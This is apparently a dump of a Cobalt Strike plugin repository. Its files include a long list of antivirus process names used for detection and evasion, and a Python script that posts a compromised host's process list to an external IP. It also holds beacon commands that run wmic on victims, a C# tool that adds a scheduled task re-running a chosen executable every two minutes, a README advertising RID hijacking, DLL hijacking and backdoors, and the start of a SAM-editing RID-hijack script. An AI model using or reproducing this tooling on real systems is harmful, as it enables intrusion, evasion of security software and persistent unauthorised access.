aiduansvx","AvastUI","emet_agent","emet_service","firesvc","firetray","hipsvc","mfevtps","mcafeefire","scan32","shstat","vstskmgr","engineserver","mfeann","mcscript","updaterui","udaterui","naprdmgr","cleanup","cmdagent","frminst","mcscript_inuse","mctray","AAWTray","Ad-Aware","MSASCui","_avp32","_avpcc","_avpm","aAvgApi","ackwin32","adaware","advxdwin","agentsvr","agentw","alertsvc","alevir","alogserv","amon9x","anti-trojan","antivirus","ants","apimonitor","aplica32","apvxdwin","arr","atcon","atguard","atro55en","atupdater","atwatch","au","aupdate","auto-protect.nav80try","autodown","autotrace","autoupdate","avconsol","ave32","avgcc32","avgctrl","avgemc","avgrsx","avgserv","avgserv9","avgw","avkpop","avkserv","avkservice","avkwctl9","avltmain","avnt","avp32","avpcc","avpdos32","avpm","avptc32","avpupd","avsched32","avsynmgr","avwin","avwin95","avwinnt","avwupd","avwupd32","avwupsrv","avxmonitor9x","avxmonitornt","avxquar","backweb","bargains","bd_professional","beagle","belt","bidef","bidserver","bipcp","bipcpevalsetup","bisp","blackd","blackice","blink","blss","bootconf","bootwarn","borg2","bpc","brasil","bs120","bundle","bvt","ccevtmgr","ccpxysvc","cdp","cfd","cfgwiz","cfiadmin","cfiaudit","cfinet","cfinet32","claw95","claw95cf","clean","cleaner","cleaner3","cleanpc","click","cmesys","cmgrdian","cmon016","connectionmonitor","cpd","cpf9x206","cpfnt206","ctrl","cv","cwnb181","cwntdwmo","datemanager","dcomx","defalert","defscangui","defwatch","deputy","divx","dllcache","dllreg","doors","dpf","dpfsetup","dpps2","drwatson","drweb32","drwebupw","dssagent","dvp95","dvp95_0","ecengine","efpeadm","emsw","ent","esafe","escanhnt","escanv95","espwatch","ethereal","etrustcipe","evpn","exantivirus-cnet","exe.avxw","expert","explore","f-agnt95","f-prot95","f-stopw","fameh32","fast","fch32","fih32","findviru","firewall","fnrb32","fp-win","fp-win_trial","fprot","frw","fsaa","fsav","fsav32","fsav530stbyb","fsav530wtbyb","fsav95","fsgk32","fsm32","fsma32","fsmb32","gator","gbmenu","gbpoll","generics","gmt","guard","guarddog","hacktracersetup","hbinst","hbsrv","hotactio","hotpatch","htlog","htpatch","hwpe","hxdl","hxiul","iamapp","iamserv","iamstats","ibmasn","ibmavsp","icload95","icloadnt","icmon","icsupp95","icsuppnt","idle","iedll","iedriver","iface","ifw2000","inetlnfo","infus","infwin","init","intdel","intren","iomon98","istsvc","jammer","jdbgmrg","jedi","kavlite40eng","kavpers40eng","kavpf","kazza","keenvalue","kerio-pf-213-en-win","kerio-wrl-421-en-win","kerio-wrp-421-en-win","kernel32","killprocesssetup161","launcher","ldnetmon","ldpro","ldpromenu","ldscan","lnetinfo","loader","localnet","lockdown","lockdown2000","lookout","lordpe","lsetup","luall","luau","lucomserver","luinit","luspt","mapisvc32","mcagent","mcmnhdlr","mctool","mcupdate","mcvsrte","mcvsshld","md","mfin32","mfw2en","mfweng3.02d30","mgavrtcl","mgavrte","mghtml","mgui","minilog","mmod","monitor","moolive","mostat","mpfagent","mpfservice","mpftray","mrflux","msapp","msbb","msblast","mscache","msccn32","mscman","msconfig","msdm","msdos","msiexec16","msinfo32","mslaugh","msmgt","msmsgri32","mssmmc32","mssys","msvxd","mu0311ad","mwatch","n32scanw","nav","navap.navapsvc","navapsvc","navapw32","navdx","navlu32","navnt","navstub","navw32","navwnt","nc2000","ncinst4","ndd32","neomonitor","neowatchlog","netarmor","netd32","netinfo","netmon","netscanpro","netspyhunter-1.2","netstat","netutils","nisserv","nisum","nmain","nod32","normist","norton_internet_secu_3.0_407","notstart","npf40_tw_98_nt_me_2k","npfmessenger","nprotect","npscheck","npssvc","nsched32","nssys32","nstask32","nsupdate","nt","ntrtscan","ntvdm","ntxconfig","nui","nupgrade","nvarch16","nvc95","nvsvc32","nwinst4","nwservice","nwtool16","ollydbg","onsrvr","optimize","ostronet","otfix","outpostinstall","outpostproinstall","padmin","panixk","patch","pavcl","pavproxy","pavsched","pavw","pccwin98","pcfwallicon","pcip10117_0","pcscan","pdsetup","periscope","persfw","perswf","pf2","pfwadmin","pgmonitr","pingscan","platin","pop3trap","poproxy","popscan","portdetective","portmonitor","powerscan","ppinupdt","pptbc","ppvstop","prizesurfer","prmt","prmvr","procdump","processmonitor","procexplorerv1.0","programauditor","proport","protectx","pspf","purge","qconsole","qserver","rapapp","rav7","rav7win","rav8win32eng","ray","rb32","rcsync","realmon","reged","regedit","regedt32","rescue","rescue32","rrguard","rshell","rtvscn95","rulaunch","run32dll","rundll","rundll16","ruxdll32","safeweb","sahagentscan32","save","savenow","sbserv","sc","scam32","scan95","scanpm","scrscan","serv95","setup_flowprotector_us","setupvameeval","sfc","sgssfw32","sh","shellspyinstall","shn","showbehind","smc","sms","smss32","soap","sofi","sperm","spf","spoler","spoolcv","spoolsv32","spyxx","srexe","srng","ss3edit","ssg_4104","ssgrate","st2","start","stcloader","supftrl","support","supporter5","svchostc","svchosts","sweep95","sweepnet.sweepsrv.sys.swnetsup","symproxysvc","symtray","sysedit","sysupd","taskmg","taskmo","taumon","tbscan","tc","tca","tcm","tds-3","tds2-98","tds2-nt","teekids","tfak","tfak5","tgbob","titanin","titaninxp","tracert","trickler","trjscan","trjsetup","trojantrap3","tsadbot","tvmd","tvtmd","undoboot","updat","update","upgrad","utpost","vbcmserv","vbcons","vbust","vbwin9x","vbwinntw","vcsetup","vet32","vet95","vettray","vfsetup","vir-help","virusmdpersonalfirewall","vnlan300","vnpc3000","vpc32","vpc42","vpfw30s","vscan40","vscenu6.02d30","vsched","vsecomr","vshwin32","vsisetup","vsmain","vsstat","vswin9xe","vswinntse","vswinperse","w32dsm89","w9x","watchdog","webdav","webtrap","wfindv32","whoswatchingme","wimmun32","win-bugsfix","win32","win32us","winactive","window","windows","wininetd","wininitx","winlogin","winmain","winnet","winppr32","winrecon","winservn","winssk32","winstart","winstart001","wintsk32","winupdate","wkufind","wnad","wnt","wradmin","wrctrl","wsbgate","wupdater","wupdt","wyvernworksfirewall","xpf202en","zapro","zapsetup3001","zatutor","zonalm2601","zonealarm","AVPM","A2CMD","A2SERVICE","A2FREE","ADVCHK","AGB","AKRNL","AHPROCMONSERVER","AIRDEFENSE","ALERTSVC","AVIRA","AMON","TROJAN","AVZ","ANTIVIR","APVXDWIN","ARMOR2NET","ASHexe","ASHENHCD","ASHMAISV","ASHPOPWZ","ASHSERV","ASHSIMPL","ASHSKPCK","ASHWEBSV","ASWUPDSV","ASWSCAN","AVCIMAN","AVCONSOL","AVENGINE","AVESVC","AVEVAL","AVEVL32","AVGAM","AVGCC","AVGCHSVX","AVGCSRVX","AVGNSX","AVGCC32","AVGCTRL","AVGEMC","AVGFWSRV","AVGNTMGR","AVGSERV","AVGTRAY","AVGUPSVC","AVINITNT","AVKSERV","AVKSERVICE","AVKWCTL","AVP32","AVPCC","AVSERVER","AVSCHED32","AVSYNMGR","AVWUPD32","AVWUPSRV","AVXMONITOR","AVXQUAR","BDSWITCH","BLACKD","BLACKICE","CAFIX","BITDEFENDER","CCEVTMGR","CFP","CFPCONFIG","CFIAUDIT","CLAMTRAY","CLAMWIN","CUREIT","DEFWATCH","DRVIRUS","DRWADINS","DRWEB","DEFENDERDAEMON","DWEBLLIO","DWEBIO","ESCANH95","ESCANHNT","EWIDOCTRL","EZANTIVIRUSREGISTRATIONCHECK","F-AGNT95","FAMEH32","FILEMON","FIREWALL","FORTICLIENT","FORTISCAN","FPAVSERVER","FPROTTRAY","FPWIN","FRESHCLAM","FSAV32","FSBWSYS","F-SCHED","FSDFWD","FSGK32","FSGK32ST","FSGUIEXE","FSMA32","FSMB32","FSPEX","FSSM32","F-STOPW","GCASDTSERV","GCASSERV","GIANTANTISPYWARE","GUARDGUI","GUARDNT","GUARDXSERVICE","GUARDXKICKOFF","HREGMON","HRRES","HSOCKPE","HUPDATE","IAMAPP","IAMSERV","ICLOAD95","ICLOADNT","ICMON","ICSSUPPNT","ICSUPP95","ICSUPPNT","INETUPD","INOCIT","INORPC","INORT","INOTASK","INOUPTNG","IOMON98","ISAFE","ISATRAY","KAV","KAVMM","KAVPF","KAVPFW","KAVSTART","KAVSVC","KAVSVCUI","KMAILMON","MAMUTU","MCAGENT","MCMNHDLR","MCREGWIZ","MCUPDATE","MCVSSHLD","MINILOG","MYAGTSVC","MYAGTTRY","NAVAPSVC","NAVAPW32","NAVLU32","NAVW32","NEOWATCHLOG","NEOWATCHTRAY","NISSERV","NISUM","NMAIN","NOD32","NORMIST","NOTSTART","NPAVTRAY","NPFMSG","NPROTECT","NSCHED32","NSMDTR","NSSSERV","NSSTRAY","NTRTSCAN","NTOS","NTXCONFIG","NUPGRADE","NVCOD","NVCTE","NVCUT","NWSERVICE","OFCPFWSVC","ONLINENT","OPSSVC","OP_MON","PAVFIRES","PAVFNSVR","PAVKRE","PAVPROT","PAVPROXY","PAVPRSRV","PAVSRV51","PAVSS","PCCGUIDE","PCCIOMON","PCCNTMON","PCCPFW","PCCTLCOM","PCTAV","PERSFW","PERTSK","PERVAC","PESTPATROL","PNMSRV","PREVSRV","PREVX","PSIMSVC","QHONLINE","QHONSVC","QHWSCSVC","QHSET","RTVSCN95","SALITY","SAPISSVC","SCANWSCS","SAVADMINSERVICE","SAVMAIN","SAVSCAN","SCANNINGPROCESS","SDRA64","SDHELP","SHSTAT","SITECLI","SPBBCSVC","SPIDERCPL","SPIDERML","SPIDERUI","SPYBOTSD","SPYXX","SS3EDIT","STOPSIGNAV","SWAGENT","SWDOCTOR","SWNETSUP","SYMLCSVC","SYMPROXYSVC","SYMSPORT","SYMWSC","SYNMGR","TAUMON","TMLISTEN","TMNTSRV","TMPROXY","TNBUTIL","TRJSCAN","VBA32ECM","VBA32IFS","VBA32LDR","VBA32PP3","VBSNTW","VCRMON","VRFWSVC","VRMONNT","VRMONSVC","VRRW32","VSECOMR","VSHWIN32","VSSTAT","WATCHDOG","WINSSNOTIFY","WRCTRL","XCOMMSVR","ZLCLIENT","ZONEALARM","360rp","afwServ","safeboxTray","360safebox","QQPCTray","KSafeTray","KSafeSvc","KWatch","gov_defence_service","gov_defence_daemon"); 3 | $tasklist=Get-Process | select-object Id,ProcessName,Path 4 | for($count=0;$count -lt $tasklist.Count;$count++){ 5 | if($avname.IndexOf($tasklist[$count].ProcessName) -ne -1){ 6 | $text=-Join("PID:",$tasklist[$count].Id,"|","ProcessName:",$tasklist[$count].ProcessName,"|","Path:",$tasklist[$count].Path) 7 | write-host $text 8 | } 9 | } 10 | 11 | Write-Host "" 12 | Write-Host "Wmic Query" 13 | wmic /NAMESPACE:\\root\SecurityCenter2 PATH AntiVirusProduct 14 | } -------------------------------------------------------------------------------- /杀毒检测/check.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib.parse 3 | import sys 4 | import os 5 | import re 6 | from bs4 import BeautifulSoup 7 | 8 | def process_check(argv): 9 | cwd=argv[2] 10 | open(os.path.join(cwd, "result_process.txt"), "w", encoding="utf-8") 11 | processlist=argv[1].replace("RaidEnMei41300000000000000000000000","\r\n") 12 | print(processlist) 13 | tmp=[] 14 | result="" 15 | url="http://42.193.251.15/tasklist.php" 16 | headers={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36","Content-Type":"application/x-www-form-urlencoded"} 17 | rqt=requests.post(url=url,headers=headers,data="avlist={}".format(urllib.parse.quote(processlist)),verify=False) 18 | html=BeautifulSoup(rqt.text,"html.parser") 19 | tdlist=html.find_all("td") 20 | for td in tdlist: 21 | tmp.append(td.get_text()) 22 | if len(tmp)==2: 23 | find_pid=re.findall("{}.*".format(tmp[0]),processlist) 24 | pid=find_pid[0].split(" ")[1] 25 | result += "{} {} PID:{}".format(tmp[0], tmp[1],pid) 26 | tmp=[] 27 | print(result,file=open(os.path.join(cwd,"result_process.txt"),"a",encoding="utf-8")) 28 | print(result) 29 | 30 | if __name__ == '__main__': 31 | process_check(sys.argv) -------------------------------------------------------------------------------- /杀毒检测/list.txt: -------------------------------------------------------------------------------- 1 | 360安全卫士=>360tray.exe 2 | 360杀毒=>360sd.exe 3 | a-squared杀毒=>a2guard.exe 4 | Lavasoft杀毒=>ad-watch.exe 5 | The Cleaner杀毒=>cleaner8.exe 6 | vb32杀毒=>vba32lder.exe 7 | Mongoosa杀毒=>MongoosaGUI.exe 8 | Coranti2012杀毒=>CorantiControlCenter32.exe 9 | F-PROT杀毒=>F-PROT.EXE 10 | CMC杀毒=>CMCTrayIcon.exe 11 | K7杀毒=>K7TSecurity.exe 12 | UnThreat杀毒=>UnThreat.exe 13 | Shield Antivirus杀毒=>CKSoftShiedAntivirus4.exe 14 | VIRUSfighter杀毒=>AVWatchService.exe 15 | ArcaVir杀毒=>ArcaTasksService.exe 16 | Immunet杀毒=>iptray.exe 17 | PSafe杀毒=>PSafeSysTray.exe 18 | nProtect杀毒=>nspupsvc.exe 19 | SpywareTerminator杀毒=>SpywareTerminatorShield.exe 20 | Bkav杀毒=>BKavService.exe 21 | Microsoft Security Essentials=>MsMpEng.exe 22 | VIPRE=>SBAMSvc.exe 23 | Norton杀毒=>ccSvcHst.exe 24 | 冰岛=>f-secure.exe 25 | 卡巴斯基=>avp.exe 26 | 江民杀毒=>KvMonXP.exe 27 | 瑞星杀毒=>RavMonD.exe 28 | 麦咖啡=>Mcshield.exe 29 | NOD32=>egui.exe 30 | 金山毒霸=>kxetray.exe 31 | 可牛杀毒=>knsdtray.exe 32 | Avira(小红伞)=>avcenter.exe 33 | Avast网络安全=>ashDisp.exe 34 | 诺顿杀毒=>rtvscan.exe 35 | 金山卫士=>ksafe.exe 36 | QQ电脑管家=>QQPCRTP.exe 37 | 流量矿石=>Miner.exe 38 | 韩国胶囊=>AYAgent.aye 39 | 安博士=>patray.exe 40 | 安博士V3=>V3Svc.exe 41 | AVG杀毒=>avgwdsvc.exe 42 | 赛门铁克=>ccSetMgr.exe 43 | QUICK HEAL杀毒=>QUHLPSVC.EXE 44 | 微软杀毒=>mssecess.exe 45 | Sophos杀毒=>SavProgress.exe 46 | F-Secure杀毒=>fsavgui.exe 47 | 比特梵德=>vsserv.exe 48 | 熊猫卫士=>remupd.exe 49 | 飞塔=>FortiTray.exe 50 | 安全狗=>safedog.exe 51 | 木马克星=>parmor.exe 52 | 贝壳云安全=>beikesan.exe 53 | 金山网盾=>KSWebShield.exe 54 | 木马猎手=>TrojanHunter.exe 55 | 巨盾网游安全盾=>GG.exe 56 | 绿鹰安全精灵=>adam.exe 57 | 超级巡警=>AST.exe 58 | 墨者安全专家=>ananwidget.exe 59 | GData=>AVK.exe 60 | Symantec Norton=>ccapp.exe 61 | AVG Anti-Virus=>avg.exe 62 | Dr.web=>spidernt.exe 63 | Mcafee=>Mcshield.exe 64 | Avira Antivir=>avgaurd.exe 65 | F-Prot AntiVirus=>F-PROT.exe 66 | ZoneAlarm=>vsmon.exe 67 | Kaspersky=>avp.exee 68 | Comodo=>cpf.exe 69 | Outpost Firewall=>outpost.exe 70 | 瑞星防火墙=>rfwmain.exe 71 | 金山网镖=>kpfwtray.exe 72 | 风云防火墙=>FYFireWall.exe 73 | 微点主动防御=>MPMon.exe 74 | 天网防火墙=>pfw.exe 75 | 发现S-U=>ServUDaemon.exe 76 | 百度杀软=>BaiduSdSvc.exe 77 | 火绒=>hipstray.exe 78 | 趋势科技=>ntrtscan.exe 79 | QQ=>QQ.exe 80 | SangforVpn(已连接上VPN)=>SangforServiceClient.exe 81 | SangforVpn=>sangforPW.exe 82 | ProcessHacker(调试机?)=>ProcessHacker.exe 83 | IDA(调试机?)=>ida.exe 84 | IDAx64(调试机?)=>ida64.exe 85 | VM虚拟机=>vmtoolsd.exe -------------------------------------------------------------------------------- /杀毒检测/process_check.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("pscheck", "" ,"用于查找list.txt里的指定进程tlick:pscheck 1 #会自动寻找指定进程所在的路径(通过调用wmic)"); 2 | beacon_command_register("xiaobaicheck", "" ,"由刨洞群的小白师傅在线进程检测提供,请求http://42.193.251.15/tasklist.php 获取返回结果"); 3 | alias pscheck { 4 | $find = $2; 5 | $fhanle = openf(script_resource("list.txt")); 6 | $fdata = readAll($fhanle); 7 | closef($fhanle); 8 | foreach $value ($fdata){ 9 | ($pname, $process) = split("=>", $value); 10 | %plist["$pname"] = "$process"; 11 | } 12 | bps($1, lambda({ 13 | local('$pid $name $entry'); 14 | foreach $entry (split("\n", $2)) { 15 | ($name, $null, $pid) = split("\\s+", $entry); 16 | foreach $key => $value (%plist){ 17 | if($name eq $value){ 18 | btask($1, "\cB$key $pid"); 19 | if($find eq "1"){ 20 | bshell($1, "wmic process where ProcessId=$pid get /value"); 21 | } 22 | } 23 | } 24 | } 25 | }, $callback => $2)); 26 | } 27 | 28 | alias xiaobaicheck{ 29 | btask($1, "远程请求http://42.193.251.15/tasklist.php 获取进程列表"); 30 | $text = ""; 31 | bps($1, lambda({ 32 | local('$pid $name $entry'); 33 | foreach $entry (split("\n", $2)) { 34 | ($name, $null, $pid) = split("\\s+", $entry); 35 | $text .= "$name $pid"."RaidEnMei41300000000000000000000000"; 36 | } 37 | $pypath = script_resource("check.py"); 38 | btask(1, "$pypath"); 39 | $cwd = script_resource(""); 40 | $process = exec("python $pypath \"$text\" $cwd"); 41 | @data = readAll($process); 42 | closef($process); 43 | #sleep(3 * 1000); 44 | $fhanle = openf(script_resource("result_process.txt")); 45 | $fdata = readAll($fhanle); 46 | closef($fhanle); 47 | foreach $value ($fdata){ 48 | btask($1, $value); 49 | } 50 | }, $callback => $2)); 51 | } 52 | -------------------------------------------------------------------------------- /杀毒检测/process_check.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/杀毒检测/process_check.png -------------------------------------------------------------------------------- /杀毒检测/xiaobaicheck.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/杀毒检测/xiaobaicheck.png -------------------------------------------------------------------------------- /权限维持/ConsoleApp1.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | using System.IO; 4 | using TaskScheduler; 5 | using System.Windows.Forms; 6 | using System.Diagnostics; 7 | 8 | 9 | namespace testschtasks 10 | { 11 | class Program 12 | { 13 | static void Main(string[] args) 14 | { 15 | string taskname = args[0]; 16 | string ostpath = args[1]; 17 | 18 | TaskSchedulerClass ts = new TaskSchedulerClass(); 19 | ts.Connect(null, null, null); 20 | ITaskFolder folder = ts.GetFolder("\\"); 21 | 22 | IRegisteredTaskCollection alltask = folder.GetTasks(1); 23 | bool isexit = false; 24 | Console.WriteLine("已存在的计划任务------>"); 25 | for (int i = 1; i < alltask.Count; i++) 26 | { 27 | Console.WriteLine(alltask[i].Name); 28 | if (alltask[i].Name.Equals(taskname)) 29 | { 30 | isexit = true; 31 | Console.WriteLine($"[Find] 指定添加的计划任务已存在:{taskname}"); 32 | break; 33 | } 34 | } 35 | 36 | if (isexit == false) 37 | { 38 | ITaskDefinition task = ts.NewTask(0); 39 | task.RegistrationInfo.Description = taskname; 40 | ITimeTrigger triger = (ITimeTrigger)task.Triggers.Create(_TASK_TRIGGER_TYPE2.TASK_TRIGGER_TIME); 41 | triger.Repetition.Interval = "PT2M"; 42 | triger.StartBoundary = DateTime.Now.ToString("yyy-MM-ddTHH:mm:ss"); 43 | IExecAction action = (IExecAction)task.Actions.Create(_TASK_ACTION_TYPE.TASK_ACTION_EXEC); 44 | action.Path = ostpath; 45 | action.Arguments = ""; 46 | IRegisteredTask regTask = folder.RegisterTaskDefinition(taskname, task, (int)_TASK_CREATION.TASK_CREATE, null, null, _TASK_LOGON_TYPE.TASK_LOGON_INTERACTIVE_TOKEN); 47 | IRunningTask runTask = regTask.Run(null); 48 | Console.WriteLine($"[+] 计划任务已添加:{taskname}"); 49 | } 50 | 51 | 52 | } 53 | } 54 | } 55 | -------------------------------------------------------------------------------- /权限维持/README.md: -------------------------------------------------------------------------------- 1 | ## 信息收集 ## 2 | 功能: 3 | * usb历史记录信息收集 4 | * 判断是否存在域 5 | * 获取系统盘符 6 | * 获取已安装的软件 7 | * 系统基本信息获取 8 | * 网络信息查询 9 | * 配置查询 10 | * 用户查询 11 | * 用户组查询 12 | * netsh端口转发设置 13 | * netsh端口转发列表查询 14 | * netsh端口转发删除 15 | * 常用软件信息收集 16 | * 向日葵信息收集 17 | 18 | ## 权限维持 ## 19 | 功能: 20 | * cs自带的beacon服务马 21 | * winrm后门 22 | * msdtc DLL劫持 23 | * WmiPrvSE提权/权限维持 24 | * CacheTask任务计划COM接口劫持 (适用于:windows 10/windows 2012以上) 25 | * RID劫持 26 | * lnk快捷键劫持 27 | * java运行class文件 28 | * dnsadmin账号组进行dns.dll劫持 (适用于域) 29 | * userAccountControl将ID设置为8192作为域控(适用于域) 30 | * 以某个进程的Token运行EXE 31 | * C#添加计划任务 32 | 33 | 待开发.............. 34 | 35 | 36 | ## cs自带的beacon服务马 ## 37 | ![](img/service/Servicebeacon.png) 38 | ![](img/service/system_beacon.png) 39 | 40 | ## msdtc DLL劫持 ## 41 | ![](img/msdtc/msdtc.png) 42 | ![](img/msdtc/msdtc2.png) 43 | 44 | ## WmiPrvSE提权/权限维持 ## 45 | ![](img/WmiPrvSE/7.png) 46 | ![](img/WmiPrvSE/2008.png) 47 | 48 | ## CacheTask任务计划COM接口劫持 ## 49 | ![](img/CacheTask/CacheTask.png) 50 | ![](img/CacheTask/CacheTask2.png) 51 | ![](img/CacheTask/CacheTask.gif) 52 | 53 | ## Rid劫持 ## 54 | ![](img/rid/1.png) 55 | ![](img/rid/0.png) 56 | ![](img/rid/2.png) 57 | ![](img/rid/4.png) 58 | ![](img/rid/6.png) 59 | 60 | ## lnk快捷键劫持 ## 61 | ![](img/lnkhijack/1.png) 62 | ![](img/lnkhijack/2.png) 63 | ![](https://z3.ax1x.com/2021/10/19/5a4Ucn.gif) 64 | 65 | ## java运行class文件 ## 66 | ![](img/javarun/run.png) 67 | 68 | ## userAccountControl将ID设置为8192作为域控 ## 69 | ![](img/userAccountControl/1.png) 70 | ![](img/userAccountControl/2.png) 71 | ![](img/userAccountControl/3.png) 72 | ![](img/userAccountControl/4.png) 73 | 74 | ## 向日葵信息收集 ## 75 | ![](img/SunloginClient/SunloginClient.png) 76 | 77 | ## 以某个进程的Token运行EXE ## 78 | ![](img/tokenrun/1.png) 79 | ![](img/tokenrun/2.png) 80 | 81 | ## C#添加计划任务 ## 82 | ConsoleApp1.cs是源码,需要依赖Interop.TaskScheduler.dll。这里利用了ILMerge打包成了addtask.exe,.NET 2.0 83 | ![](img/schtasks/1.png) 84 | ![](img/schtasks/2.png) 85 | ![](img/schtasks/3.png) 86 | -------------------------------------------------------------------------------- /权限维持/addtask.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/addtask.exe -------------------------------------------------------------------------------- /权限维持/img/CacheTask/CacheTask.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/CacheTask/CacheTask.gif -------------------------------------------------------------------------------- /权限维持/img/CacheTask/CacheTask.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/CacheTask/CacheTask.png -------------------------------------------------------------------------------- /权限维持/img/CacheTask/CacheTask2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/CacheTask/CacheTask2.png -------------------------------------------------------------------------------- /权限维持/img/SunloginClient/SunloginClient.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/SunloginClient/SunloginClient.png -------------------------------------------------------------------------------- /权限维持/img/WmiPrvSE/2008.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/WmiPrvSE/2008.png -------------------------------------------------------------------------------- /权限维持/img/WmiPrvSE/7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/WmiPrvSE/7.png -------------------------------------------------------------------------------- /权限维持/img/javarun/run.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/javarun/run.png -------------------------------------------------------------------------------- /权限维持/img/lnkhijack/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/lnkhijack/1.png -------------------------------------------------------------------------------- /权限维持/img/lnkhijack/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/lnkhijack/2.png -------------------------------------------------------------------------------- /权限维持/img/msdtc/msdtc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/msdtc/msdtc.png -------------------------------------------------------------------------------- /权限维持/img/msdtc/msdtc2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/msdtc/msdtc2.png -------------------------------------------------------------------------------- /权限维持/img/rid/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/rid/0.png -------------------------------------------------------------------------------- /权限维持/img/rid/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/rid/1.png -------------------------------------------------------------------------------- /权限维持/img/rid/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/rid/2.png -------------------------------------------------------------------------------- /权限维持/img/rid/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/rid/4.png -------------------------------------------------------------------------------- /权限维持/img/rid/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/rid/6.png -------------------------------------------------------------------------------- /权限维持/img/schtasks/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/schtasks/1.png -------------------------------------------------------------------------------- /权限维持/img/schtasks/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/schtasks/2.png -------------------------------------------------------------------------------- /权限维持/img/schtasks/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/schtasks/3.png -------------------------------------------------------------------------------- /权限维持/img/service/Servicebeacon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/service/Servicebeacon.png -------------------------------------------------------------------------------- /权限维持/img/service/system_beacon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/service/system_beacon.png -------------------------------------------------------------------------------- /权限维持/img/tokenrun/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/tokenrun/1.png -------------------------------------------------------------------------------- /权限维持/img/tokenrun/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/tokenrun/2.png -------------------------------------------------------------------------------- /权限维持/img/userAccountControl/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/userAccountControl/1.png -------------------------------------------------------------------------------- /权限维持/img/userAccountControl/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/userAccountControl/2.png -------------------------------------------------------------------------------- /权限维持/img/userAccountControl/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/userAccountControl/3.png -------------------------------------------------------------------------------- /权限维持/img/userAccountControl/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/userAccountControl/4.png -------------------------------------------------------------------------------- /权限维持/ridhijack.ps1: -------------------------------------------------------------------------------- 1 | write-host "Rid Hijack Start" 2 | $inidata="HKEY_LOCAL_MACHINE\SAM [1 17] 3 | HKEY_LOCAL_MACHINE\SAM\SAM [1 17] 4 | HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1 17] 5 | HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1 17] 6 | HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1 17] 7 | 